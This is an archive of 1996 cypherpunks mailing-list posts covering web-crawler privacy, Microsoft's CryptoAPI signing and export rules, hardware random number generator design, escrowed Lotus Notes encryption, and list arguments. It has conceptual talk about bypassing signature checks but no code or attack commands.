----- Begin Included Message -----

From: <monier@pa.dec.com>
Subject: Re: Alta Vista searches WHAT?!? 
Date: Tue, 16 Jan 96 14:47:51 -0800
X-Mts: smtp

Hum, one more time.

Scooter, the robot behind Alta Vista, follows links, and only follows links.
If the "directory browsing" option is enabled on a server, and someone publishes
the URL for a directory, then the robots gets back a page of HTML which lists
every file as a link, but that is not intentional.  And yes, this has led to
embarrassing situations, but again, it's not intentional.
In the absence of strong conventions about directory names or file extensions
it is hard for a robot to exclude anything a-priori.  I wish it was easier...

To keep a document private, list it in /robots.txt, password-protect it, change
the protection on the file, or simpler: do not leave it in your Web hierarchy.
Can you imagine what happens when someone uses / as web root, exposing for 
example the password file?  It has happened!

Remember that what a robot does, anyone with a browser can do: find this private
file and then post to usenet for example, robots have no magic powers!

The bottom line is that the usual danger is not aggressive robots, but 
clueless Web masters.


		--Louis


----- End Included Message -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 18 Jan 1996 04:03:35 +0800
To: mab@research.att.com
Subject: "trust management" vs. "certified identity"
Message-ID: <ad22cff3000210040087@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


This is reminiscent of a recent idea of mine. Imagine the following signed
declaration:

I (fingerprint = ...) claim that the code X with SH (secure hash) = ...
satisfies contract with SH= ... when its free code pointers are bound to
other code conforming to contracts identified within X by their SH's.

The contracts would be either formal or informal.

When a Java program arrives at a client it can warrant its services if it
finds local access to warranted sub-routines. (For this purpose behaviors
of objects are sub-routines.)

The Java loader can build warrants recursively with such declarations. They
would, of course, be relative to the reputation of signers of the above
declarations.

I have just sent for your paper.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com
Date: Thu, 18 Jan 1996 02:45:02 +0800
To: cypherpunks@toad.com
Subject: Netscape & the NSA
Message-ID: <v02130500ad22ebeff05e@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Folks interested might want to check out

http://gnn-e2a.gnn.com/gnn/wr/96/01/12/features/nsa/index.html

Not much new to those who follow it.

-j






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 18 Jan 1996 08:08:00 +0800
To: mab@research.att.com
Subject: Re: Microsoft's CAPI
In-Reply-To: <199601171502.KAA16060@nsa.tempo.att.com>
Message-ID: <pxT/w8m9LAcF085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601171502.KAA16060@nsa.tempo.att.com>,
Matt Blaze <mab@research.att.com> wrote:

> The OS will not load just any old CSP.  CSPs have to be signed by
> Microsoft.  The kernel contains a (hardcoded?) 1024 RSA public key
> that it uses to check the signature when the user tries to load a CSP.
> If the signature check fails, the CSP won't load.  Microsoft says it
> will sign any CSP from anyone AS LONG AS THEY CERTIFY THAT THEY WILL
> FOLLOW THE EXPORT RULES.  So you can get your CSP signed if you use
> exportable cryptography or if you agree not to send it outside the US
> and Canada, etc.  But an end user can't just compile crypto code and
> use it as a CSP, even for his or her own use, without getting it
> signed by Microsoft first (actually, the CSP development kit does
> allow this, but it uses a special version of the OS).

The next obvious question is:  Will Microsoft sign strong-crypto CSPs
developed by foreign developers for out-of-USA use?



- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMP09JuVevBgtmhnpAQHbyQMAw3yh1qhIrBD0RF2ppiiiJnwJkF45qMKm
vsjXXZY92dJPbdLcOebxBRPCBxpyRSVqVKsy6QPA0KsYdLIgFt+ziFYWRrv3PFjz
f3Jf2dg+rhJ6G4dhDhTqp4/pdUT0huzy
=78Il
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Thu, 18 Jan 1996 05:12:09 +0800
To: pitz@onetouch.com
Subject: Re: pgp broken?: my mistake
Message-ID: <9601171819.AA18488@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I apologise for including the following line:

>>On 16 Jan 96 at 19:16, Derek Atkins wrote:

Making it appear that Mr Atkins had something to do with the 
quote, which he did not.  After rereading, the entire post 
has a sort of nasty tone that I did not intend.  Oh, well,
maybe I should return to lurk mode for a while...
Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 18 Jan 1996 03:16:14 +0800
To: cypherpunks@toad.com
Subject: Non-bogus reporter seeks sources for story on MS Windows networking/security problems
Message-ID: <Pine.ULT.3.91.960117102700.12274B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Free-lance writer and co-author of "Practical UNIX Security" seeks
substantive reliable sources, preferably for attribution, on the history
of the SMB, C$, and .PWL encryption bugs in both Windows 95 and Windows
for Workgroups, but especially on what problems will remain after next
week's "Service Pack 1." He might drop the story because of a dearth of 
sources and promises from Microsoft that everything has already been 
fixed, and will be distributed to the Netless masses via the SP 1 CD 
(the contents of which are not public knowledge, but which surely went to 
manufacturing some time ago...).

I don't want to spam his mailbox, but his PGP key is 0x903C9265, with 
fingerprint 68 06 7B 9A 8C E6 58 3D  6E D8 0E 90 01 C5 DE 01. You might 
also run into him in person at this week's RSA Data conference in San 
Francisco.

Please reply directly to the reporter with a subject line starting with 
"MS*" (assuming that's not too maudlin for you) because he gets a lot of 
mail. He isn't seeking any more mail on unrelated subjects.

Stuff funnelled through me, especially from anonymous sources, is properly
not considered relibable (though I might appreciate a Cc). 

Bcc'd to the reporter.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMP1D1o3DXUbM57SdAQER4wQAnmmESUU8WW4awrHiBTzSVn8j1cN1gUI/
xxfRHVZ5AQGmQPMRNgr9tJaeN4c+5LsR7CzVxhTlGNTnU5B5cg6w3LvOgXpfhhVW
MdNvxB/b8XJBs3XybuTtTnxYC+Qv8Hm1PPt63ULaurFW9c2BPhJk7ZcHo1Ju3X72
e/9VZtmSIBo=
=WslA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Thu, 18 Jan 1996 03:31:54 +0800
To: cypherpunks@toad.com
Subject: Re: Random Number Generators
In-Reply-To: <0kzHl6200bky0_dkQ0@andrew.cmu.edu>
Message-ID: <199601171909.LAA05247@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy Nali writes:

> [ CMOS RNG chip ]
> ...  The most promising design I've seen so far (that I can actually
> do) is based on clocking a D flip-flop in the following way:
> ...
> The slow clock has enough random variation in it's period  for the Dff
> to generate random numbers.

While a scheme like this will work, one of the needs in a design like
this is convincing yourself of how much entropy is available from the
noisy clock and where it comes from.  It's nontrivial to evaluate
the phase noise of a CMOS relaxation oscillator, for example.
Also, at what rate do you want random bits?

> Can anyone give me pointers or references to other types of true random
> number generators and to ways of correcting the biases and other
> problems in the resulting random bitstream?

The references in Applied Cryptography are pretty useful; the only other
ones I know of are a tech report by Gifford at MIT/LCS and a thesis
by Sridhar Vembu (who also works here at Qualcomm) on optimal extraction
of entropy from biased sources.

> One thing I'm concerned about is making sure the random bitstream is
> uniformly random.  What effects, if any, will things like thermal noise,
> power comsumption (what if there is a sudden rise in power comsumption
> in another part of the circuit), etc. have on the randomness of the
> bitstream?  

I'd say thermal noise is your friend; the other systematics, as you
say, are a slight issue, but their effect on the entropy is very small
and they'll be taken out by the postprocessing (hash function, etc.).

> I'd also appreciate any other suggestions or advice you have on RNGs.

I plan to make a simple board-level RNG design available to the net Real
Soon Now.  I'd be interested to see your CMOS design when it's finished.
(By the way, try searching the cypherpunks and sci.crypt archives on the
subject. There's lots of good discussion.)

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 18 Jan 1996 01:41:29 +0800
To: <cypherpunks@toad.com
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <Pine.BSD.3.91.960117091755.13335C-100000@usr4.primenet.com>
Message-ID: <9601171713.AA28904@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Looney tune #4535 writes

>	that's the bullshit they would like you to believe.
>
>	in the first place, under military regs, a degree research would 
>    be illegal without full permission.  It also was not given to just one
>    unit, but to many ==and all identified ones were either SEALS or
>    USMC recon and special units --why just he elite and why so many
>    groups --all with a blessing...?

Could you please remove yourself from cypherpunks to a place where conspiracy 
theories are wanted.  This list is for discussion of cryptography and the only 
conspiracy theories we are interested involve the NSA, MI5 or the Stay-Puffed 
Marshmellowman.


There is plenty of material to fuel whatever conspiracy theories you like. 
Please consult Noam Chomsky for details. 


Just please take the gun.nut conversation somewhere else. After allits in your 
own best interests, it doesn't take much to realise that the government is 
monitoring cypherpunks very carefully and that it when they come round 
collecting the guns in October they will know where to look first. So if the 
most important thing in your life is lethal weaponry best not take any risks eh?


	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Thu, 18 Jan 1996 01:45:52 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Crypto on private files
Message-ID: <Pine.3.89.9601171247.A22932-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


In a brief NPR report on the Leary case (he is alleged to have firebombed 
the NYC subway) there is a decision due on whether prosecutors can force 
him to give up passwords for his personal computer files (he was a 
computer professional). His attorney is claiming 5th amendment privilige.

According to the newscaster, the NY state court decision should be a 
first in this type of case. Prosecutors argue it is no different from
being forced to turn over a diary.

The report does not say what type of protection was used.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scox@factset.com (Sean Cox)
Date: Thu, 18 Jan 1996 02:06:44 +0800
To: mab@research.att.com (Matt Blaze)
Subject: Re: Microsoft's CAPI
In-Reply-To: <199601171502.KAA16060@nsa.tempo.att.com>
Message-ID: <9601171731.AA03797@sundog.factset.com.factset.com>
MIME-Version: 1.0
Content-Type: text


According to Matt Blaze:

[[ Prelude about MS Cryptography API deleted ]]

>Despite all this, I think it will be easy to get around the CSP
>signature requirements and use homebrew, unsigned crypto even with
>pre-compiled .exe files from other sources.  I suspect it will be easy
>to write a program, for example, that takes an executable program
>and converts CryptoAPI calls to calls that look like just another DLL.
>And I'm sure someone will write a program to patch the NT/Windows
>kernel to ignore the signature check.  Needless to say, it would be
>nice if someone outside the US were to write and distribute programs
>to do this.  It would also be nice if someone would write a Unix/Linux
>version of the API/CSP mechanism.  It might make it possible to export
>applications for those platforms as well.

	Did MS mention how the crypto DLL's would be "protected" from 
surreptitious tampering?  What I'm wondering is if it will be possible
to "drop in" a new (signed) crypto.dll (that just happens to
forward cleartext to the DLL author, or perhaps uses intentionally 
deficient (or just fixed) keys) when installing, for example, the latest
game craze distributed on the Internet?
	It would seem to be fairly sketchy (and dangerous) to allow drop-in
crypto engines if those can be replaced with *ANY* other crypto engine at
any time (note for the paranoid: Imagine "NSA the Game" for Windows(TM) with
the new "Send the Feds a copy" encryption DLL--that last part in fine print
of coures :)
	I am hoping that they do have some for of protection against this
that hasn't been mentioned yet, but this kind of jumps out at me when I
think of drop-in DLLs (anyone ever see how well the WINSOCK.DLL scheme
works? God Forbid that an encryption scheme be subject to the same problems!)

	--Sean

#include <std_disclaimer.h>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Jan 1996 01:57:26 +0800
To: Jay Holovacs <holovacs@styx.ios.com>
Subject: Re: Crypto on private files
In-Reply-To: <Pine.3.89.9601171247.A22932-0100000@styx.ios.com>
Message-ID: <199601171727.MAA04956@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jay Holovacs writes:
> According to the newscaster, the NY state court decision should be a 
> first in this type of case. Prosecutors argue it is no different from
> being forced to turn over a diary.

This is probably a good reason that it would be important for EFF
or similar right thinking attorneys to become involved in the case.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Thu, 18 Jan 1996 02:16:42 +0800
To: Mutatis Mutantdis <wlkngowl@unix.asb.com>
Subject: SHA-2
In-Reply-To: <199601170238.VAA25799@UNiX.asb.com>
Message-ID: <Pine.3.89.9601171231.A16122-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 17 Jan 1996, Mutatis Mutantdis wrote:

> It is a random-noise device driver for DOS, which samples fast
> timings between keystrokes, disk access, clock-drift, and even mouse
> movement or audio card and hashes with SHA-2 algorithm to generate
> some good-quality randomness.

Schneier mentioned last year in one of his conference reports that SHA
was being revised, yet I couldn't find it in Applied Crypto 2 (I admit
that I don't yet own the new one, and I haven't taken a good enough look 
while browsing it in the bookstores), anyone have any pointers to the new 
spec?

Please correct me if I am wrong.
TIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 18 Jan 1996 02:17:55 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <199601171817.NAA08086@jafar.sware.com>
Message-ID: <9601171748.AA29071@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Yes.  Only left-wing, anti-libertarian rants are permitted under the
>new list rules.  Contact Phill directly for a permit.

Your permit is enclosed in the header of this message.

Glad to be of service.

	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 18 Jan 1996 05:18:07 +0800
To: cypherpunks@toad.com
Subject: Re: THE RECIPROCAL ?......
Message-ID: <2.2.32.19960117204930.008b9dd4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 AM 1/17/96 -0600, you wrote:
>
>Terence Joseph Mallon writes:
> > "When people talk of encryption they use the word break, they are
> > approaching from one way but not the only way. I am at present trying the
> > reciprocal, that is, to mend."
>
>Why do I sometimes feel that personalities that once were drawn to
>design of perpetual motion machines or techniques for squaring circles
>may very soon flock to cryptographic "research"?

Actually, I think she was just fucking with his mind...

It sounds like an answer that I would give to a paranoid newbie, given half
the chance.  (If I had thought of it...) "A mindfuck is a terrible thing to
waste."

I am sometimes surprised at the number of "They have broken PGP" stories I
keep hearing.  People who know NOTHING about cryptography somehow "know"
that PGP has somehow been "broken".  I wonder how these memes are getting
into the culture at large?






Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Jan 1996 02:32:39 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <199601171817.NAA08086@jafar.sware.com>
Message-ID: <199601171758.MAA05027@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Barber writes:
> > Just please take the gun.nut conversation somewhere else.
> 
> Yes.  Only left-wing, anti-libertarian rants are permitted under the
> new list rules.  Contact Phill directly for a permit.

I'm as libertarian as they come, but really, random non-crypto talk
that has a home elsewhere doesn't belong here on cypherpunks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 18 Jan 1996 05:51:31 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus to export 64 bit, partially-escrowed Notes
In-Reply-To: <9601172102.AA29445@zorch.w3.org>
Message-ID: <199601172109.NAA12724@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Note that it is slightly easier to break this encryption than the 128 bit 
> encryption with 68 bits sent in the clear used by Netscape.  
> 
> I think in general that any steps taken to reduce the amount of information 
> avaliable. I'm happier if only the US government has access to the extra 28 bits 
> of privacy than if everyone does. That is not to say that I am happy.

Of course, if someone patches the program to incorrectly encrypt the 28 
bits for the government, it will be transparent until some nasty TLA
tries decrypting the key.  

This was the same problem that existed with the Clipper LEAF, if I
recall correctly, in that systems with hacked LEAF fields interoperated 
perfectly with unmodified ones. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Date: Thu, 18 Jan 1996 03:00:37 +0800
To: cypherpunks@toad.com
Subject: Random Number Generators
Message-ID: <0kzHl6200bky0_dkQ0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi all

	For a class project, I will be designing a VLSI cmos chip to generate
truly random numbers (The chip will be fabricated).  I'm limited to a
2-micron standard cmos technology (no fancy BiCMOS, MISC, or anthing
else).  The most promising design I've seen so far (that I can actually
do) is based on clocking a D flip-flop in the following way:


			         	-----
	8Khz clock ------	| 	|----- Random output
				|	|
				|	|
(sloppy) slow clock	----  |>	|
				|	|
				-----

The slow clock has enough random variation in it's period  for the Dff
to generate random numbers.   The random bits will , of course, have
biases that will need to be corrected with things like Xor gates.


Can anyone give me pointers or references to other types of true random
number generators and to ways of correcting the biases and other
problems in the resulting random bitstream?   I'd also appreciate a
pointer to an intro text (if such a thing exists) on what makes random
numbers good random numbers.  (and before you say it, yes I have Applied
Cyptography.  It's a great book.)

One thing I'm concerned about is making sure the random bitstream is
uniformly random.  What effects, if any, will things like thermal noise,
power comsumption (what if there is a sudden rise in power comsumption
in another part of the circuit), etc. have on the randomness of the
bitstream?  

I'd also appreciate any other suggestions or advice you have on RNGs.

Thanks in advance.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 18 Jan 1996 02:17:24 +0800
To: hallam@w3.org
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <9601171713.AA28904@zorch.w3.org>
Message-ID: <199601171817.NAA08086@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:

> >	that's the bullshit they would like you to believe.

> Could you please remove yourself from cypherpunks to a place where conspiracy 
> theories are wanted.

> Just please take the gun.nut conversation somewhere else.

Yes.  Only left-wing, anti-libertarian rants are permitted under the
new list rules.  Contact Phill directly for a permit.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 18 Jan 1996 06:01:34 +0800
To: cypherpunks@toad.com
Subject: [Local] Update Information for Portland Cpunks Meeting
Message-ID: <2.2.32.19960117212104.008c6dc8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


The Portland Cypherpunks meeting is still on.  We will be having 
a key signing.

Reminder about time and location:

Location:       The Habit Internet Cafe
                21st and Clinton in Portland OR
                http://www.teleport.com/~habit/  for more info.

Date:           January 20th, 1996  (THIS SATURDAY)
Time:           5:23pm

So far I have received only four keys for the key signing.  I am 
kind of disappointed about the results of the proposed key signing 
for the meeting...

If you are planning on attending, even if you are not planning on 
participating in the key signing, I need to know so the Habit can 
plan for the added influx of people.  So far I have a large pile 
of "maybes" and few confirmations.                           

If you have topics you would like to do a presentation on, please 
give me information on it so that I can distribute it to the other 
participants. (Or bring it up before the meeting.)
   
                           *** NOTE ***
Teleport (my ISP) has been having mail problems.  If you have sent 
me mail and not received an confirmation, please resend.  I may not 
have received it.

Currently, there is only one other speaker confirmed (besides 
myself).  I would like to see more input from the rest, so this 
does not just become a one way spouting of information.

The one confirmed speaker will be presenting some of his findings 
on remailers involving reliability and getting nyms to function 
for those not versed in the field.  It should be useful information 
for anyone using remailers.  (He had a few findings that surprised 
me...)

I have had a few interesting "maybes", but I will wait until (or if) 
they show up...





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMP1nl+QCP3v30CeZAQFtGAf8DEofknvToxZWO5upwZoFiSUCaENrPtM/
6t6Mdl3eTZHan28qJV9vXkKAG6Q9gANQ342NQeH1CbmOalNLxnVrETbKTKv8llNG
ASH1iZML//JEQJT3XeHYHAPBBCg18zIfskjU0h0of60MzmcsykHN/ZJTIpps8UIq
sgB8fk2Uh9LVg/VFyIvnVnpIMQPZ1W+Z5YQco3rEnqKycKjOi0E0XoKsaJFoWelj
1aHtmWrXxC1Lr2H7fVa0DsF5Vh3w5h2RaelpZBR8QB7Uz8JwYb4jaBtdkrSMlqeg
IGZaKirdZDX7i0geB905aVVdiRrahbAz4nV82DxkVEbn/h56XHAtvg==
=3PKR
-----END PGP SIGNATURE-----
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 18 Jan 1996 06:07:30 +0800
To: hackmsoft@c2.org
Subject: Hack Microsoft Promotion Gets some Press
Message-ID: <Pine.ULT.3.91.960117132035.12619G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Just FYI, and patting everybody on the back. I've tried to deflect the 
credit, and at least in PC Week I was successful.

January 8th PC Week, Netwired section, only distributed in print I think 
(which is odd). It mentions c2.org as a "controversial link" on the 
win95netbugs FAQ, which is odd because nobody has ever complained to me 
or on the newsgroups about it. But controversy sells, so that's probably 
a plus anyway.

 http://www.zdnet.com/~pcweek/   (their Web server sucks, though, you might 
                                  not get through)

InfoWorld, next issue, probably on the cover.

 http://www.infoworld.com/pageone/nickextra.htm

San Jose Mercury News, probably tomorrow or the next day, not sure whether
it's the main section or the computing/business section. 

 http://www.sjmercury.com/
 MERCURY on America "Online"

Simson is rapidly approaching deadline and has frozen his sources, so
please disregard my last about sending anything further to him. I will
accept it and pass it on to anyone who inquires in the future. I think I
was probably too timid by half in not violating anyone's anonymity by even
forwarding notes to Simson and by not spamming Simson's mailbox, but
that's OK, it'll all come out eventually. 

Watch these spaces for Microsoft's response.

 http://www.microsoft.com/windows/pr/clarifications.htm
 http://www.wagged.com/

Three cheers especially for Peter, Frank, and Sameer.

-rich@c2.org
 http://www.c2.org/hackmsoft/
 llurch@networking.stanford.edu
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Donelan <SEAN@SDG.DRA.COM>
Date: Fri, 19 Jan 1996 02:29:35 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto on private files
Message-ID: <960117134408.5492@SDG.DRA.COM>
MIME-Version: 1.0
Content-Type: text/plain


>According to the newscaster, the NY state court decision should be a 
>first in this type of case. Prosecutors argue it is no different from
>being forced to turn over a diary.

No, its the same as being forced to translate or interpret a diary entry.

Prosecutor: Please turn over the name you have 'encrypted' as "Mr. X" in
your diary.
-- 
Sean Donelan, Data Research Associates, Inc, St. Louis, MO
  Affiliation given for identification not representation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Jan 1996 03:19:50 +0800
To: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Subject: Re: Random Number Generators
In-Reply-To: <0kzHl6200bky0_dkQ0@andrew.cmu.edu>
Message-ID: <199601171900.OAA05127@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Timothy L. Nali" writes:
> 	For a class project, I will be designing a VLSI cmos chip to generate
> truly random numbers (The chip will be fabricated).  I'm limited to a
> 2-micron standard cmos technology

> The most promising design I've seen so far (that I can actually
> do) is based on clocking a D flip-flop in the following way:

I'd say that the design you have picked has a couple of problems with
it. The first is that you are, from what I can tell, building a
synchronizer, which means that you may have metastability
problems. (Your diagram wasn't completely clear so I can't
tell).

Also, you are depending on a sloppy clock and a not sloppy clock
actually having the stated properties, which means you aren't really
generating randomness so much as hoping you can detect and exploit
it. As it is very hard to determine if a stream is really random, this
makes your life difficult.  Far better to try to use some analog
tricks in the circuit itself to generate the random numbers for
you. Of course, some of these end up producing metastability problems
of their own...

Can anyone point this guy at good texts on all of this? I've never
found one...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 18 Jan 1996 03:54:07 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto anarchist getting through customs
Message-ID: <v02120d06ad22f74ccb71@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 PM 1/17/96, hallam@w3.org wrote:
>...only
>conspiracy theories we are interested involve the NSA, MI5 or the Stay-Puffed
                                                                   ^^^^^^^^^^^
>Marshmellowman.
 ^^^^^^^^^^^^^^
ROTFL.  Yes. Well. He just seemed so soft and friendly. I figured thinking
about *him* couldn't hurt...

Cheers,
Bob



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@GS160.SP.CS.CMU.EDU
Date: Thu, 18 Jan 1996 03:50:23 +0800
To: cypherpunks@toad.com
Subject: Re: FW: Net Control is Thought Control
In-Reply-To: <+cmu.andrew.internet.cypherpunks+4kz3qSq00UfAM0yv9n@andrew.cmu.edu>
Message-ID: <9601171916.AA20225@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <+cmu.andrew.internet.cypherpunks+4kz3qSq00UfAM0yv9n@andrew.cmu.edu>
Mr. Nuri writes:
>that 9 of the last 10 flamewars on this list were actually carefully
>orchestrated, *manufactured* by a single person interested in making
>this point, and teasing people that refused to believe that rampant
>dischord can be sown through a barrage of pseudonyms. 

Enough already.

We all know that discussion groups are subject to disruption by
flamers, and that anonymity can reduce accountability.  What is more
interesting is whether the use of pseudonyms adds any new
possibilities.

>how can you be so sure that the cypherpunks lists is really what you 
>think it is? a bunch of people from around the country independently
>interested in crypto? an agent provacteur, or agent saboteur, could
>create a vastly different perception regardless of the input of other
>people.

Ah, conspiracy theories again.  A conspiracy of one does have certain
advantages over the old-fashioned approach of gathering several
like-minded people.  Communication costs are reduced, and the problem
of trust is eliminated.  On the other hand, a conspiracy of one isn't
much good for anything but playing games on the net -- cattle mutilation
is really a two-man job, and infiltrating the U.S. Government is right
out.

Being a good Medusa may be easier than controlling the banking system,
but it seems to be quite hard.  Your history suggests that stylistic
analysis may be used to link nyms.  A sufficiently skilled writer
might be able to avoid this.  An individual known to me was wanking
around with pseudonyms (from nyx, I think) on rec.music.industrial in
'92-93; he did a decent job of stylistic variation, but was noticed on
the basis of the response patterns of his articles (and nailed by nyx
usage logs, but that's another matter).  There are several Usenet
examples of people trying to use inapparent pseudonyms without lasting
success.

The classic response, of course, is that the real conspiracies are too
good to be detected, and/or they off the investigative reporters.
This is not falsifiable, but we can compare pseudonym conspiracies to
meat ones: the risk is lower, particularly in an regime of
unconditionally-secure pseudonyms from which the Medusa can simply
walk away.  But you don't get real-world power or money.  You get to
put in a lot of effort for a chance at unduly swaying public opinion
on one forum.  (And if you screw up, you get a lot of attention --
this may be a major draw for some.)  But there are easier and more
effective techniques: press releases and paid advertising, for
example.  Who needs pseudonyms?

Side note:
>another very interesting effect to measure is the following: if there
>is already a lot of mail on a list, people tend to post less.

I would say the opposite.

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Jan 1996 07:42:18 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus to export 64 bit, partially-escrowed Notes
Message-ID: <m0tcgtN-0008xeC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:45 PM 1/17/96 -6, Peter Trei wrote:

>A new 'international' version of Lotus notes is being released, with
>64 bit session keys, as opposed to the old 40 bit version.
>
>24 bits of the session key are stored encrypted under a special, 
>government-access RSA public key. This is in addittion to the full
>64 bit key being available under the recipient's public RSA key.
>
>The idea is that the USG would have to search only a 40-bit keyspace,
>while others will need to search a 64-bit keyspace.
>Reportedly, this 'workfactor reduction key' will NOT be available to 
>foreign governments.
>My colleague reports that opinion at the conference was divided over
>whether Lotus was doing something which made good business
>sense, or whether this was 'caving-in'.

My "vote"?  They're "caving-in."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Thu, 18 Jan 1996 10:08:57 +0800
To: "Timothy L. Nali" <perry@piermont.com>
Subject: RE: Random Number Generators
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG960117144111CF009D00@red-02-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


If you're going to work with hardware to get really random numbers, why not 
go to the back of any of several PC-type magazines, and order the radiation 
detector board that someone is hawking? Can't really do any better than 
that, can you? Counting cosmic ray hits and noting their time differentials 
should be just what the doctor ordered, right?

Kurt

----------
